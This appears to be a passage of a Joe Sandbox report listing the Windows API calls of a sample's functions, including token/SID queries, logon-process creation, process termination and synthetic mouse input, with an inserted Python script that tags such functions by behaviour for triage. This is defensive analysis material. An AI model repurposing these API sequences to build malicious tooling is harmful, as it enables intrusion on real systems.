                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                • String ID:
                                                                                                                • API String ID: 650687236-0
                                                                                                                • Opcode ID: 1756b0b28991b41be9b9d19e4c4e7616797a3332e2a357b3240029b5efab5db7
                                                                                                                • Instruction ID: 202410a806e323769abdba4fb576bac8991733f6d4c910928ea5d4100f7a588e
                                                                                                                • Opcode Fuzzy Hash: 1756b0b28991b41be9b9d19e4c4e7616797a3332e2a357b3240029b5efab5db7
                                                                                                                • Instruction Fuzzy Hash: 39517C31E00615EFCF11EF64C845AAEBBB4EF49320F114469E856BB351CB74AE41DB91
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0093EF06
                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 0093EF78
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0093EFD3
                                                                                                                • _memmove.LIBCMT ref: 0093EFFD
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0093F04A
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0093F078
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1101466143-0
                                                                                                                • Opcode ID: 7b64cbd07b94d4fd10cfe7d4b47453e9767260ab9dfd2d7d5e1f8245e9b53e5d
                                                                                                                • Instruction ID: 19d1e8c2a1bfd9f1a623fac7a37c151416a4f37a654c0f91654e044f95650d58
                                                                                                                • Opcode Fuzzy Hash: 7b64cbd07b94d4fd10cfe7d4b47453e9767260ab9dfd2d7d5e1f8245e9b53e5d
                                                                                                                • Instruction Fuzzy Hash: 4B5166B5A00209EFCB14CF58C894AAAB7B8FF4C314F15856AE959DB341E734E911CFA0
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00942258
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009422A3
                                                                                                                • IsMenu.USER32(00000000), ref: 009422C3
                                                                                                                • CreatePopupMenu.USER32 ref: 009422F7
                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00942355
                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00942386
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311875123-0
                                                                                                                • Opcode ID: 7fbe833a3502859085173bc81808db7e772fbe4f74a940af3acde53077beefb1
                                                                                                                • Instruction ID: 167d2bcef9130361ebdf97763cdf28647689835fc63602e32e62d3187b66d814
                                                                                                                • Opcode Fuzzy Hash: 7fbe833a3502859085173bc81808db7e772fbe4f74a940af3acde53077beefb1
                                                                                                                • Instruction Fuzzy Hash: C351CF3060420ADFDF25CF68D888FAEBBF9BF45714F508629F811A7290E3B99944CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 008E179A
                                                                                                                • GetWindowRect.USER32(?,?), ref: 008E17FE
                                                                                                                • ScreenToClient.USER32(?,?), ref: 008E181B
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008E182C
                                                                                                                • EndPaint.USER32(?,?), ref: 008E1876
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 1827037458-0
                                                                                                                • Opcode ID: ccf1bb9f9ac87d1600b1d7e37db40ee5e7c5c513abfd29b565ce20cf60d65b45
                                                                                                                • Instruction ID: dbb068be58b3230b343ff2991c1f5459390373ae2da6784cf329fdc908361f01
                                                                                                                • Opcode Fuzzy Hash: ccf1bb9f9ac87d1600b1d7e37db40ee5e7c5c513abfd29b565ce20cf60d65b45
                                                                                                                • Instruction Fuzzy Hash: 4A41A131208344AFDB10DF29DC88FBA7BE8FB4A724F144669F5A4C61B1C7709845EB62
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(009A57B0,00000000,01455560,?,?,009A57B0,?,0096B5A8,?,?), ref: 0096B712
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0096B736
                                                                                                                • ShowWindow.USER32(009A57B0,00000000,01455560,?,?,009A57B0,?,0096B5A8,?,?), ref: 0096B796
                                                                                                                • ShowWindow.USER32(00000000,00000004,?,0096B5A8,?,?), ref: 0096B7A8
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0096B7CC
                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0096B7EF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: a1554ee6dc1e07dee195596b8a4cec9929598224c6d53af5ea1362335ea57701
                                                                                                                • Instruction ID: d4a264d82ab7cf297b38258d16c915fa61a247283beaeda34e391d2c7eba82ec
                                                                                                                • Opcode Fuzzy Hash: a1554ee6dc1e07dee195596b8a4cec9929598224c6d53af5ea1362335ea57701
                                                                                                                • Instruction Fuzzy Hash: 3041C034604244EFDB22CF28C499B947BE4FF85311F1881B9F948CFAA2D771A896CB50
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00954E41,?,?,00000000,00000001), ref: 009570AC
                                                                                                                  • Part of subcall function 009539A0: GetWindowRect.USER32(?,?), ref: 009539B3
                                                                                                                • GetDesktopWindow.USER32 ref: 009570D6
                                                                                                                • GetWindowRect.USER32(00000000), ref: 009570DD
                                                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0095710F
                                                                                                                  • Part of subcall function 00945244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                • GetCursorPos.USER32(?), ref: 0095713B
                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00957199
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4137160315-0
                                                                                                                • Opcode ID: df117964285e36145f21917d7f665a69765d192889cb25b9804ac69f41ff4233
                                                                                                                • Instruction ID: 7566621acda721e7c83a144df6d1a22193931e4572fda18f96a88ed0bfd34872
                                                                                                                • Opcode Fuzzy Hash: df117964285e36145f21917d7f665a69765d192889cb25b9804ac69f41ff4233
                                                                                                                • Instruction Fuzzy Hash: B331F272108305ABC720DF55E849F9BB7A9FF88304F000919F88597191C770EA08CB92
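Triage aid for listings in this format. This is an added example written for this page; it is not part of the Joe Sandbox report, the IDA plugin, or the sample. It parses the per-function "APIs" blocks above into structured call records (API name, module, resolved immediates, call-site address, whether the call was reported via a subcall), then tags each function by what its API combination implies (registry value enumeration, token SID handling, synthetic mouse input, window-message injection) and decodes the immediates the listing did resolve. SAMPLE_LISTING is a constructed excerpt copied from three entries on this page (the RegEnumValueW, mouse_event and GetTokenInformation functions); the tag names, the rule table and the constant tables (MOUSEEVENTF_* bits, TOKEN_INFORMATION_CLASS values) are the editor's own additions, not Joe Sandbox output, and nothing here asserts what the sample does with the data.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' blocks and tag functions by behaviour.

Added example, not report or sample code. Constant tables are the editor's own.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line, e.g. "• RegEnumValueW.ADVAPI32(?,-00000001,...), ref: 00960349"
# or "  • Part of subcall function 009380A9: GetTokenInformation.ADVAPI32(...), ref: 009380C0".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
APIID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>\S+)")

# Constructed excerpt copied from the report entries on this page.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 00960E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0095FDAD,?,?), ref: 00960E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009602BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009602FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00960349
• RegCloseKey.ADVAPI32(00000000), ref: 00960399
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00954E41,?,?,00000000,00000001), ref: 009570AC
• GetDesktopWindow.USER32 ref: 009570D6
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0095710F
• GetCursorPos.USER32(?), ref: 0095713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00957199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
APIs
  • Part of subcall function 009380A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009380C0
• GetLengthSid.ADVAPI32(?,00000000,0093842F), ref: 009388CA
• CopySid.ADVAPI32(00000000,00000000,?), ref: 009388F6
• HeapFree.KERNEL32(00000000), ref: 00938911
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                       # int for resolved hex immediates, None for '?'
    ref: int                         # call-site address from "ref:"
    via_subcall: Optional[str] = None  # callee address when listed as "Part of subcall"


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""

    @property
    def names(self):
        return {c.name for c in self.calls}

    @property
    def lowest_ref(self):
        """Lowest direct call site: a usable locator since the excerpt has no function address."""
        direct = [c.ref for c in self.calls if c.via_subcall is None]
        return min(direct) if direct else None


def _parse_arg(tok):
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)  # int() accepts "-00000001"


def parse_listing(text):
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":            # each "APIs" header opens a new function
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), m["sub"]))
            continue
        m = APIID_RE.match(line)
        if m:
            cur.api_id = m["id"]
    return entries


# (tag, all of these must be present, at least one of these must be present). Editor's rules.
RULES = [
    ("registry-value-enumeration", {"RegEnumValueW"}, {"RegOpenKeyExW", "RegConnectRegistryW"}),
    ("remote-registry-capable", {"RegConnectRegistryW"}, set()),
    ("token-sid-harvesting", {"GetTokenInformation"}, {"CopySid", "GetLengthSid"}),
    ("synthetic-mouse-input", {"mouse_event"}, set()),
    ("window-message-injection", set(), {"PostMessageW", "SendMessageW"}),
]

MOUSEEVENTF = {0x0001: "MOVE", 0x0002: "LEFTDOWN", 0x0004: "LEFTUP", 0x0008: "RIGHTDOWN",
               0x0010: "RIGHTUP", 0x0020: "MIDDLEDOWN", 0x0040: "MIDDLEUP",
               0x0800: "WHEEL", 0x8000: "ABSOLUTE"}
TOKEN_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
               18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel"}


def classify(entry):
    names = entry.names
    return [tag for tag, need_all, need_any in RULES
            if need_all <= names and (not need_any or need_any & names)]


def decode_mouse_flags(flags):
    bits = [n for bit, n in sorted(MOUSEEVENTF.items()) if flags & bit]
    return "|".join("MOUSEEVENTF_" + n for n in bits) or hex(flags)


def decode_notes(entry):
    """Render the immediates the listing resolved as named constants."""
    notes = []
    for c in entry.calls:
        if c.name == "mouse_event" and c.args and c.args[0] is not None:
            notes.append(f"mouse_event flags {decode_mouse_flags(c.args[0])} @ {c.ref:08X}")
        if c.name == "GetTokenInformation" and len(c.args) > 1 and c.args[1] is not None:
            cls = TOKEN_CLASS.get(c.args[1], f"class {c.args[1]}")
            notes.append(f"GetTokenInformation({cls}) @ {c.ref:08X}")
    return notes


def triage(text):
    return [{"ref": f"{e.lowest_ref:08X}", "api_id": e.api_id, "calls": len(e.calls),
             "tags": classify(e), "notes": decode_notes(e)} for e in parse_listing(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE_LISTING):
        print(row)
```

Run it on a whole report export by replacing SAMPLE_LISTING with the file contents; the parser only keys on the "APIs" header and the bullet lines, so the per-entry "Memory Dump Source" and hash lines are ignored. The tag rules are deliberately conservative (a function must show the enumeration or copy call, not just an open or a length query) so that the AutoIt runtime's many generic helpers do not all light up.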
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009380A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009380C0
                                                                                                                  • Part of subcall function 009380A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009380CA
                                                                                                                  • Part of subcall function 009380A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009380D9
                                                                                                                  • Part of subcall function 009380A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009380E0
                                                                                                                  • Part of subcall function 009380A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009380F6
                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,0093842F), ref: 009388CA
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009388D6
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009388DD
                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 009388F6
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0093842F), ref: 0093890A
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00938911
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                • String ID:
                                                                                                                • API String ID: 3008561057-0
                                                                                                                • Opcode ID: b76aa23959fa5412538b281221deec07461b7648dc4e54b8a5ea922f688837c1
                                                                                                                • Instruction ID: 0632a1ac77e797a78a2925205779bb4a2e6fc863fa7a5a32302226e37a1f8feb
                                                                                                                • Opcode Fuzzy Hash: b76aa23959fa5412538b281221deec07461b7648dc4e54b8a5ea922f688837c1
                                                                                                                • Instruction Fuzzy Hash: 4E119D71525209FBDB109FA4DC19BBF77ACFB45355F10402CF88597110CB769904DB60
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009385E2
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 009385E9
                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009385F8
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00938603
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00938632
                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00938646
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                • Opcode ID: feaa0b811db6fe8efccf0cf2a6aa3c4f98bac94d7d280a0e15072896606c4d09
                                                                                                                • Instruction ID: 79a78e651621a7a6f812b50b4c961b5b2e1460d7b23f5e21509ef44ebc4f6701
                                                                                                                • Opcode Fuzzy Hash: feaa0b811db6fe8efccf0cf2a6aa3c4f98bac94d7d280a0e15072896606c4d09
                                                                                                                • Instruction Fuzzy Hash: 6711597251420DABDF018FA4ED49FEF7BA9EF08348F044068FE04A2160C7B28D64EB60
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0093B7B5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0093B7C6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0093B7CD
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0093B7D5
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0093B7EC
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0093B7FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1035833867-0
                                                                                                                • Opcode ID: a90b10a7f9cf45f1a012517f76f5200201368bfdbc1fda077c115ca18f7f3b64
                                                                                                                • Instruction ID: eb6f694a520ac61143d1eb17c63e65d645dc19f1bda16033200aa2f5fa09fa0d
                                                                                                                • Opcode Fuzzy Hash: a90b10a7f9cf45f1a012517f76f5200201368bfdbc1fda077c115ca18f7f3b64
                                                                                                                • Instruction Fuzzy Hash: 84014475E04219BBEF109BA6DD45B5EBFB8EB48751F004079FA04A7291D6709C10DF91
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00900193
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0090019B
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009001A6
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009001B1
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 009001B9
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 009001C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: d72e4e74bed28dedc6da74d8f4b896b0fc9c5f6d39872491bc8069bab2fd28dc
                                                                                                                • Instruction ID: 6a29fae1f652c9eb359f100ca35c22ebfc98381be128179a3f3ae2bef5d4d40f
                                                                                                                • Opcode Fuzzy Hash: d72e4e74bed28dedc6da74d8f4b896b0fc9c5f6d39872491bc8069bab2fd28dc
                                                                                                                • Instruction Fuzzy Hash: A10148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7F5A864CBE5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009453F9
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0094540F
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0094541E
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094542D
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00945437
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0094543E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: a051ffb3ccb1d5fa5761a30a2b87f2e436d8ddf6fd4000005dc3a3d45e0187dd
                                                                                                                • Instruction ID: adf6eec2d0770317328210a9a5f506e83d971fe1bbd7eba146090a4f270faff9
                                                                                                                • Opcode Fuzzy Hash: a051ffb3ccb1d5fa5761a30a2b87f2e436d8ddf6fd4000005dc3a3d45e0187dd
                                                                                                                • Instruction Fuzzy Hash: AEF06D32258558BBE3205BA2EC0DEAB7A7CEBC7B51F00016DFA04D106196E01A0196B5
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00947243
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,008F0EE4,?,?), ref: 00947254
                                                                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,008F0EE4,?,?), ref: 00947261
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,008F0EE4,?,?), ref: 0094726E
                                                                                                                  • Part of subcall function 00946C35: CloseHandle.KERNEL32(00000000,?,0094727B,?,008F0EE4,?,?), ref: 00946C3F
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00947281
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,008F0EE4,?,?), ref: 00947288
